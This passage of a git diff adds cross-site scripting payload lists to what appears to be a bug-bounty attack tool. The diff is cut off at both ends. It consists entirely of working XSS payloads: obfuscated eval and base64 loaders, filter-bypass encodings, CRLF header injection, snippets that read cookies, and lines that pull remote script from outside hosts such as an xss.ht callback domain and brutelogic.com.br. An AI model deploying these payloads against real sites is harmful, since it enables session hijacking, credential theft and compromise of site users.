XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> +<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script># +<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> +<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea> +<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> +<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea> +<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22> +<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E +<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`> +<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E +<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe> +<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script> +<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); +Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script> +<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> +<div onmouseover='alert&lpar;1&rpar;'>DIV</div> +<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> +<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> +<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ? +<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">? +<var onmouseover="prompt(1)">On Mouse Over</var>? +<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> +<img src="/" =_=" title="onerror='prompt(1)'"> +<%<!--'%><script>alert(1);</script --> +<script src="data:text/javascript,alert(1)"></script> +<iframe/src \/\/onload = prompt(1) +<iframe/onreadystatechange=alert(1) +<svg/onload=alert(1) +<input value=<><iframe/src=javascript:confirm(1) +<input type="text" value=``<div/onmouseover='alert(1)'>X</div> +http://www.<script>alert(1)</script .com +<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ? +<svg><script ?>alert(1) +<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> +<img src=`xx:xx`onerror=alert(1)> +<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> +<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>? +<math><a xlink:href="//jsfiddle.net/t846h/">click +<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>? +<svg contentScriptType=text/vbs><script>MsgBox+1 +<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a +<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> +<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ +<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F +<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script ???????????? +<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> +<script>+-+-1-+-+alert(1)</script> +<body/onload=&lt;!--&gt;&#10alert(1)> +<script itworksinallbrowsers>/*<script* */alert(1)</script ? +<img src ?itworksonchrome?\/onerror = alert(1)??? +<svg><script>//&NewLine;confirm(1);</script </svg> +<svg><script onlypossibleinopera:-)> alert(1) +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe +<script x> alert(1) </script 1=2 +<div/onmouseover='alert(1)'> style="x:"> +<--`<img/src=` onerror=alert(1)> --!> +<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ? +<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>? +"><img src=x onerror=window.open('https://www.google.com/');> +<form><button formaction=javascript&colon;alert(1)>CLICKME +<math><a xlink:href="//jsfiddle.net/t846h/">click +<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>? +<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> +<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> +"><img src=x onerror=prompt(1);> \ No newline at end of file diff --git a/bounty_drive/attacks/xss/payloads/XSS-OFJAAAH.txt b/bounty_drive/attacks/xss/payloads/XSS-OFJAAAH.txt new file mode 100644 index 0000000..849f1c4 --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/XSS-OFJAAAH.txt @@ -0,0 +1,2976 @@ +: \');confirm(1);// +<x/onmouSeenter=window[`\x61\x6c\x65\x72\x74`]`1337` +<script>prompt(1)</script> +<script>confirm(1)</script> +<script>var fn=window[490837..toString(1<<5)]; fn(atob('YWxlcnQoMSk='));</script> +<script>var fn=window[String.fromCharCode(101,118,97,108)]; fn(atob('YWxlcnQoMSk='));</script> +<script>var fn=window[atob('ZXZhbA==')];fn(atob('YWxlcnQoMSk=')); </script> +<script>window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script> <script>this[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script> <script>this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](++[[]][+[]])</script> <script>this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))</script> +<script>'str1ng'.replace(/1/,alert)</script> <script>'bbbalert(1)cccc'.replace(/a\w{4}\(\d\)/,eval)</script> <script>'a1l2e3r4t6'.replace(/(.).(.).(.).(.).(.)/,function(match,$1,$2,$3,$4,$5) { this[$1+$2+$3+$4+$5](1); })</script> +<script>eval('\\u'+'0061'+'lert(1)')</script> <script>throw~delete~typeof~prompt(1)</script> <script>delete[a=alert]/prompt a(1)</script> <script>delete[a=this[atob('YWxlcnQ=')]]/prompt a(1)</script> <script>(()=>{return this})().alert(1)</script> +<script>new function(){new.target.constructor('alert(1)')();}</script> <script>Reflect.construct(function(){new.target.constructor('alert(1)')()},[])</script> +<link/rel=prefetch import href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg> +<link rel="import" href="data:x,<script>alert(1)</script> <script>Array.from1${alert}3${window}2</script> +<script>!{x(){alert(1)}}.x()</script> <script>Array.from${eval}alert\1\``</script> <script>Array.from([1],alert)</script> <script>Promise.reject("1").then(null,alert)</script> +<svg </onload ="1> (_=alert,_(1)) ""> +javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'> +<marquee loop=1 width=0 onfinish=alert(1)> +<p onbeforescriptexecute="alert(1)"><svg><script>\</p> +<img onerror=alert(1) src <u></u> <videogt;<source onerror=javascript:prompt(911)gt; +<base target="<script>alert(1)</script>"><a href="javascript:name">CLICK</a> +<base href="javascript:/"><a href="**/alert(1)"><base href="javascript:/"><a href="**/alert(1)"> +<style>@KeyFrames x{</style><div style=animation-name:x onanimationstart=alert(1)> < +<script> +${``[class extends[alert``]{}]} +</script> <script>[class extends[alert``]{}]</script> +<script>throw new class extends Function{}('alert(1)')``</script> <script>x=new class extends Function{}('alert(1)'); x=new x;</script> <script>new class extends alert(1){}</script> +<script>new class extends class extends class extends class extends alert(1){}{}{}{}</script> +<script>new Image()[unescape('%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74')][atob('ZGVmYXVsdFZpZXc=')][8680439..toString(30)](1)</script> <script src=data:,\u006fnerror=\u0061lert(1)></script> +"><svg><script/xlink:href="data:,alert(1) <svg><script/xlink:href=data:,alert(1)></script> <frameset/onpageshow=alert(1)> +<div onactivate=alert('Xss') id=xss style=overflow:scroll> +<div onfocus=alert('xx') id=xss style=display:table> +"><script src=https://hackeroneofjaaah.xss.ht></script> +javascript:eval('var a=document.createElement(\'script\');a.src=\'https://hackeroneofjaaah.xss.ht\';document.body.appendChild(a)') +"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vaGFja2Vyb25lb2ZqYWFhaC54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 autofocus> +"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vaGFja2Vyb25lb2ZqYWFhaC54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))> +"><iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;&#97;&#114;&#32;&#97;&#61;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#34;&#115;&#99;&#114;&#105;&#112;&#116;&#34;&#41;&#59;&#97;&#46;&#115;&#114;&#99;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;hackeroneofjaaah.xss.ht&#34;&#59;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#97;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;"> +<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//hackeroneofjaaah.xss.ht");a.send();</script> +<script>$.getScript("//hackeroneofjaaah.xss.ht")</script> +><object+data=//14.rs> +><script src=//pastebin.com/raw/WDWWYaLA></script> +<img src=x onerror=prompt(document.domain) onerror=prompt(document.domain) onerror=prompt(document.domain)> +</script><svg><script>alert(1)-%26apos%3B +anythinglr00</script><script>alert(document.domain)</script>uxldz +anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz +<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object> +<svg onload\r\n=$.globalEval("al"+"ert()");> +?"></script><base%20c%3D=href%3Dhttps:\mysite> +<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x> +<a href=javas&#99;ript:alert(1)> +<Img src = x onerror = "javascript: window.onerror = alert; throw XSS"> +<Video> <source onerror = "javascript: alert (XSS)"> +<Input value = "XSS" type = text> +<applet code="javascript:confirm(document.cookie);"> +<isindex x="javascript:" onmouseover="alert(XSS)"> +"></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +"><img src="x:x" onerror="alert(XSS)"> +"><iframe src="javascript:alert(XSS)"> +<object data="javascript:alert(XSS)"> +<isindex type=image src=1 onerror=alert(XSS)> +<img src=x:alert(alt) onerror=eval(src) alt=0> +<img src="x:gif" onerror="window['al\u0065rt'](0)"></img> +<iframe/src="data:text/html,<svg onload=alert(1)>"> +<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> +<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script +<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> +<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> +<form><a href="javascript:\u0061lert(1)">X +</script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/onerror='eval(src)'> +<style>//*{x:expression(alert(/xss/))}//<style></style> +On Mouse Over​ +<img src="/" =_=" title="onerror='prompt(1)'"> +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe +<script x> alert(1) </script 1=2 +<form><button formaction=javascript&colon;alert(1)>CLICKME +<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" +<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> +<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> +<iframe srcdoc="&lt;svg/onload=alert()&gt;"> +</script><svg><script>alert(1)-%26apos%3B +anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz +<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object> +<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x> +<a href=javas&#99;ript:alert(1)> +javascript:alert("OfJAAH"): +<style>@keyframes a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}&#x60;> +<d3v/onauxclick=[2].some(confirm)>click +<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'> +{1==1}"><object+data=javascript%26colon%3b'str1ng'.replace('1',alert)> +'><img src=x onError=prompt("OpenBugBounty")> +'><img+sRc=l+oNerrOr=prompt(document.cookie)+x> +"><object+data=javascript%26%63%6f%6c%6f%6e%3b'straccessng'.replace('access',alert)> +<svg/ \/\/%20%20%20%20%20onload%20%20%20%20%20 =%20%20%20%20%20%20%20 window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))> +<svg/ subsoloprivxss \/\/%20%20%20%20%20onload%20%20%20%20%20 =%20%20%20%20%20%20%20 window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))> +<script>x = '<!--<script>'/*</script>-->*/;alert(1)</script +<svg onload="import('data:text/javascript,al'+''+'ert(0)')"> +<image src\r\n=valid.jpg onloadend='new class extends (co\u006efir\u006d)/**/`` &lcub;&rcub;'> +<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];"> +<</p>iframe src=javascript:alert()// +<bleh/onclick=top[/al/.source+/ert/.source]&Tab;``>click +<head></head><body>padding<bleh onclick="top[/al/.source+/ert/.source] ``">clickpadding</bleh></body> +<details onauxclick=confirm`xss`></details> +<frameset onpageshow=alert(1)> +<svg onunload=http://window.open ('javascript:alert(1)')> +<xss class=progress-bar-animated onanimationstart=alert(1)> +<xss<script>>&28;prompt();&28;<</script>/xss> +<svg><b><style><img id="&lt;/style&gt;&lt;img src=1 onerror=alert(1)&gt;"> +<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;> +<svg%0Aonauxclick=0;[1].some(confirm)// +<</div>script</div>>alert()<</div>/script</div>> +<svg onload=alert(1)> +"><svg onload=alert(1)> +</tag><svg onload=alert(1)> +"></tag><svg onload=alert(1)> +"onmouseover=alert(1) // +"autofocus onfocus=alert(1) // +<img src=something onauxclick="new Function `al\ert\`xss\``"> +<svg id=javascript:alert(10) onload=location=id> +<svg/onload=%26nbsp;alert`bohdan`+ +1'"><img/src/onerror=.1|alert``> +<img src="img-src" onloadstart="alert(45)"> +<img src="img-src" onloadend="alert(45)"> +<img src onerror=%26emsp;prompt`${document.domain}`> +'-alert(1)-' +'-alert(1)// +\'-alert(1)// +</script><svg onload=alert(1)> +'}alert(1);{' +'}alert(1)%0A{' +\'}alert(1);{// +-alert(1)//\ +-alert(1)}//\ +${alert(1)} +'onload=alert(1)><svg/1=' +'>alert(1)</script><script/1=' +*/alert(1)</script><script>/* +*/alert(1)">'onload="/*<svg/1=' +`-alert(1)">'onload="`<svg/1=' +*/</script>'>alert(1)/*<script/1=' +p=<svg/1='&q='onload=alert(1)> +p=<svg 1='&q='onload='/*&r=*/alert(1)'> +q=<script/&q=/src=data:&q=alert(1)> +"><svg onload=alert(1)>.gif +<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/> +<img src=1 onerror=alert(1)> +<iframe src=javascript:alert(1)> +<details open ontoggle=alert(1)> +<svg><svg onload=alert(1)> +data:text/html,<img src=1 onerror=alert(1)> +data:text/html,<iframe src=javascript:alert(1)> +><svg onload=alert(1)>?a=reader +<script src=data:,alert(1)> +<script src=//brutelogic.com.br/1.js> +<iframe src=TARGET_URL onload="frames[0].postMessage('INJECTION','*')"> +<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1)</x:script> +<x:script xmlns:x="http://www.w3.org/1999/xhtml" src="//brutelogic.com.br/1.js"/> +%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0A%0D%0A%3Cscript +%3Ealert(1)%3C/script%3E +%0D%0ALocation:%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D +%0A%0D%0A%3Cscript%3Ealert(1)%3C/script%3E +<p style=overflow:auto;font-size:999px onscroll=alert(1)>AAA<x/id=y></p>#y +<<!--%23set var="x" value="svg onload=alert(1)"--><!--%23echo var="x"-->> +1<svg onload=alert(1)> +1"><svg onload=alert(1)> +'1<svg onload=alert(1)> +<svg onload=alert(1)>\ +<Svg OnLoad=alert(1)> +<Script>alert(1)</Script> +<svg onload=alert(1)// +<svg onload="alert(1)" +<SVG ONLOAD=&#97&#108&#101&#114&#116(1)> +<SCRIPT SRC=//BRUTELOGIC.COM.BR/1></SCRIPT> +<script/x>alert(1)</script> +%253Csvg%2520o%256Eload%253Dalert%25281%2529%253E +%2522%253E%253Csvg%2520o%256Eload%253Dalert%25281%2529%253E +alert`1` +setTimeout`alert\x28document.domain\x29` +setInterval`alert\x28document.domain\x29` +<svg onload=alert&lpar;1&rpar;> +<svg onload=alert&#40;1&#41> +[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\141\154\145\162\164\50\61\51')() +(alert)(1) +a=alert,a(1) +[1].find(alert) +top["al"+"ert"](1) +top[/al/.source+/ert/.source](1) +al\u0065rt(1) +top['al\145rt'](1) +top[8680439..toString(30)](1) +top.open`javas\cript:al\ert(1)` +"o<x>nmouseover=alert<x>(1)// +"autof<x>ocus o<x>nfocus=alert<x>(1)// +<script src=https://www.google.com/complete/search?client=chrome%26jsonp=alert(1);></script> +<script>alert(1)</script> +<script src=data:,alert(1)> +<iframe src=javascript:alert(1)> +<embed src=javascript:alert(1)> +<a href=javascript:alert(1)>click +<math><brute href=javascript:alert(1)>click +<form action=javascript:alert(1)><input type=submit> +<isindex action=javascript:alert(1) type=submit value=click> +<form><button formaction=javascript:alert(1)>click +<form><input formaction=javascript:alert(1) type=submit value=click> +<form><input formaction=javascript:alert(1) type=image value=click> +<form><input formaction=javascript:alert(1) type=image src=SOURCE> +<isindex formaction=javascript:alert(1) type=submit value=click> +<object data=javascript:alert(1)> +<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;> +<svg><script xlink:href=data:,alert(1) /> +<math><brute xlink:href=javascript:alert(1)>click +<x contenteditable onblur=alert(1)>lose focus! +<x onclick=alert(1)>click this! +<x oncopy=alert(1)>copy this! +<x oncontextmenu=alert(1)>right click this! +<x onauxclick=alert(1)>right click this! +<x oncut=alert(1)>copy this! +<x ondblclick=alert(1)>double click this! +<x ondrag=alert(1)>drag this! +<x contenteditable onfocus=alert(1)>focus this! +<x contenteditable oninput=alert(1)>input here! +<x contenteditable onkeydown=alert(1)>press any key! +<x contenteditable onkeypress=alert(1)>press any key! +<x contenteditable onkeyup=alert(1)>press any key! +<x onmousedown=alert(1)>click this! +<x onmousemove=alert(1)>hover this! +<x onmouseout=alert(1)>hover this! +<x onmouseover=alert(1)>hover this! +<x onmouseup=alert(1)>click this! +<x contenteditable onpaste=alert(1)>paste here! +'-alert(1)-'<svg> +\'-alert(1)//<svg> +<svg/on<script><script>load=alert(1)//</script> +<SCRİPT>alert(1)</SCRİPT> +<SCRİPT/SRC=data:,alert(1)> +%CA%BA>%EF%BC%9Csvg/onload%EF%BC%9Dalert%EF%BC%881)> +<svg><set onbegin=alert(1)> +<svg><set end=1 onend=alert(1)> +%u003Csvg onload=alert(1)> +%u3008svg onload=alert(2)> +%uFF1Csvg onload=alert(3)> +"><svg/onload=alert(1)>"@x.y +\74svg o\156load\75alert\501\51\76 +</script><svg><script>alert(1)// +</script><script>'%0B'-alert(1)// +"`-alert(1)</script><script>` +?p[<script>`]=`/alert(1)</script> +';onerror=alert;throw 1// +"'>confirm&lpar;1)</Script><Svg><Script/1=' +%01Jav%09asc%09ript:https://DOMAIN/%250Acon%09firm%25%281%25%29 +<x onmouseenter=alert(1)> +<x onafterscriptexecute=alert(1)> +<x onbeforescriptexecute=alert(1)> +<x onanimationend=alert(1)><style>x{animation:s}@keyframes s{} +<x onwebkitanimationend=alert(1)><style>x{animation:s}@keyframes s{} +<svg><use 